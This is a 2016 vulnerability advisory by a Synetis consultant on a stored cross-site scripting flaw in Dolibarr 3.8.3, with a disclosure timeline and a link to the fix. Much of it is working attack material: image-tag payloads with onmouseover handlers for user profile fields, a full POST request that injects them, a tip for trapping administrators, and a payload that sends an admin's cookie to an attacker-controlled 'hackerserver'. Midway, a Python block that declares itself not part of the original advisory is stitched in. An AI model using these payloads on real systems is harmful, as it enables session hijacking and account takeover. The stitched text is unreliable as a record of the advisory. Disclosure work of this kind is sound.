######################################################################
# Exploit Title: XSS on Dolibarr 3.8.3
# Date: 03/01/2016
# Author: Mickael Dorigny @ Synetis
# Vendor or Software Link: http://www.dolibarr.org/
# Category: XSS
######################################################################

Dolibarr description :
======================================================================
Dolibarr ERP & CRM is a modern and easy to use web application to manage your business (contacts, invoices, orders, products, stocks, agenda, emailings, etc.).

It is open source and free software designed for small companies, foundations and freelancers.
You can install and use it as a standalone application, or online on a shared or dedicated server to use it from anywhere. Dolibarr is also available on ready to use cloud services.

Vulnerability description :
======================================================================
A stored XSS is present in the Dolibarr 3.8.3 core code. No module needs to be activated to exploit this vulnerability, because an attacker can use the user attributes management to do it.

This XSS can be exploited through a basic user account on the Dolibarr installation. Impacted users are administrators and any user who has the right to view other users' attributes.

PoC n°1 : Stored XSS in user attributes
======================================================================
Once a simple user is logged in with his account, he can modify his attributes such as Last name, First name, Mobile number, etc. This information can be reviewed by other users who have administration privileges.

Note that some basic protection is applied after form submission. This protection does not allow an attacker to use common JavaScript tricks such as "<script>" tags or the "onerror" event handler, but some other events are still allowed.

Using the <IMG> HTML tag and the "onmouseover" JavaScript event, we can make an admin move his mouse over the injected image. This event can be used to execute arbitrary JavaScript in the administrator's browser, or in the browser of any other user allowed to view user attributes.

PoC : 
As an authenticated user, fill the "Last name", "First name", "email", "job" or "signature" input with this :
user1<img src=x onmouseover=alert(1)>

[REQUEST]
http://server/dolibarr/htdocs/user/card.php?id=2
[POSTDATA]
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="token"
3e01b40f4659396870a384c16213e400
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="action"
update
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="entity"
1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="lastname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="photo"; filename=""
Content-Type: application/octet-stream
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="firstname"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="job"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="gender"
man
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="login"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="password"
user1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="admin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="superadmin"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_phone"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="user_mobile"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="office_fax"

-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="email"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="signature"
user1<img src=x onmouseover=alert(1)>
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="fk_user"
-1
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="weeklyhours"
0
-----------------------------7677991721297181448923571907
Content-Disposition: form-data; name="save"
Save
-----------------------------7677991721297181448923571907--

Note that the "First name" and "Last name" inputs are displayed in the "List of users" page, but they are truncated after 50 characters. This truncation limits the available XSS payloads. We can use the "signature" input to insert more JavaScript instructions in the same HTML form. Admins will then see this signature when they click on a user in the "List of users" to view all of his attributes.

The injected image can point to an existing or a non-existent image. A little tip to increase the chance of trapping an admin is to use a very large image (like 1920*1080) that will cover the whole page.

Once the attributes are modified, another user such as an admin can view them and will then execute the JavaScript by moving his mouse over the injected image. Here is another PoC that sends the admin's cookie to a website controlled by the attacker using an HTTP GET request. Inject this payload in the "signature" input :
<img src=x onmouseover=document.location="http://hackerserver?c="+document.cookie+"">

Using this vulnerability, an attacker could tamper with page rendering, redirect the victim to a fake login page, or capture user credentials such as cookies.
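To make the defensive point behind this advisory concrete, here is an added example (not Dolibarr code and not part of the original advisory): a constructed stand-in for the deny-list behaviour described above (only "<script>" and "onerror" blocked), beside context-aware HTML escaping that neutralises the same payload, plus a scanner an administrator could run over stored user attributes to find inline event handlers without rendering them. The deny-list regex and the sample user records are assumptions built only from what this advisory states.

```python
import html
import re

# Payload quoted in the advisory (used here as sample input).
PAYLOAD = "user1<img src=x onmouseover=alert(1)>"

# Constructed stand-in for the deny-list behaviour the advisory describes:
# it removes <script> tags and the "onerror" attribute and nothing else.
# This is an assumption about behaviour, not Dolibarr's actual code.
DENY_LIST = re.compile(r"<\s*/?\s*script[^>]*>|onerror", re.IGNORECASE)

def denylist_filter(value: str) -> str:
    """Deny-list sanitiser: any event handler not on the list survives."""
    return DENY_LIST.sub("", value)

def escape_for_html_body(value: str) -> str:
    """Context-aware output encoding (same contract as PHP htmlspecialchars
    with ENT_QUOTES): '<', '>', '&' and quotes can no longer form markup."""
    return html.escape(value, quote=True)

# Any on*= attribute inside a tag: catches onmouseover and its siblings.
EVENT_HANDLER = re.compile(r"<[^>]*\bon[a-z]+\s*=", re.IGNORECASE)

def contains_event_handler(value: str) -> bool:
    return EVENT_HANDLER.search(value) is not None

# Fields the advisory names as injectable.
SCANNED_FIELDS = ("lastname", "firstname", "job", "email", "signature")

def scan_user_attributes(users):
    """Return (login, field) pairs whose stored value carries an inline event
    handler, so an administrator can review them without rendering them."""
    findings = []
    for user in users:
        for field in SCANNED_FIELDS:
            if contains_event_handler(user.get(field, "")):
                findings.append((user["login"], field))
    return findings

# Constructed sample records standing in for rows of the user table.
SAMPLE_USERS = [
    {"login": "user1", "lastname": PAYLOAD, "firstname": "user1", "signature": PAYLOAD},
    {"login": "admin", "lastname": "Doe", "firstname": "John", "signature": "Regards, John"},
]

if __name__ == "__main__":
    print("deny-list leaves:", denylist_filter(PAYLOAD))
    print("escaped output:  ", escape_for_html_body(PAYLOAD))
    print("findings:", scan_user_attributes(SAMPLE_USERS))
```

The deny-list leaves the advisory's payload untouched while escaping renders it inert, which is why the fix for this class of bug is output encoding at render time rather than a longer block list.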


Screenshots :
======================================================================
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-03.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-04.jpg
- http://www.information-security.fr/wp-content/uploads/2016/01/dolibarr-3.8.3-xss-stored-05.jpg

Solution: 
======================================================================

The fix for this vulnerability is available in the Dolibarr GitHub repository : https://github.com/Dolibarr/dolibarr/issues/4341  / https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56
 
Additional resources :
======================================================================
- https://www.youtube.com/watch?v=p2rFWJOCJC8
- http://www.information-security.fr/en/xss-dolibarr-version-3-8-3/ 
- https://github.com/Dolibarr/dolibarr/issues/4341
- https://github.com/Dolibarr/dolibarr/commit/36dc8b1ce79c972c867b804778c5b780caea8a56
 

Report timeline :
======================================================================
2016-01-03 : Vendor informed of the vulnerability
2016-01-07 : Vulnerability fixed
2016-01-11 : Advisory published

Credits :
======================================================================
 
    88888888
   88      888                                         88    88
  888       88                                         88
  788           Z88      88  88.888888     8888888   888888  88    8888888.
   888888.       88     88   888    Z88   88     88    88    88   88     88
       8888888    88    88   88      88  88       88   88    88   888
            888   88   88    88      88  88888888888   88    88     888888
  88         88    88  8.    88      88  88            88    88          888
  888       ,88     8I88     88      88   88      88   88    88  .88     .88
   ?8888888888.     888      88      88    88888888    8888  88   =88888888
       888.          88
                    88    www.synetis.com
                 8888  Consulting firm in management and information security
 
Mickael Dorigny - Security Consultant @ Synetis | Information-Security.fr

--
SYNETIS 
CONTACT: www.synetis.com | www.information-security.fr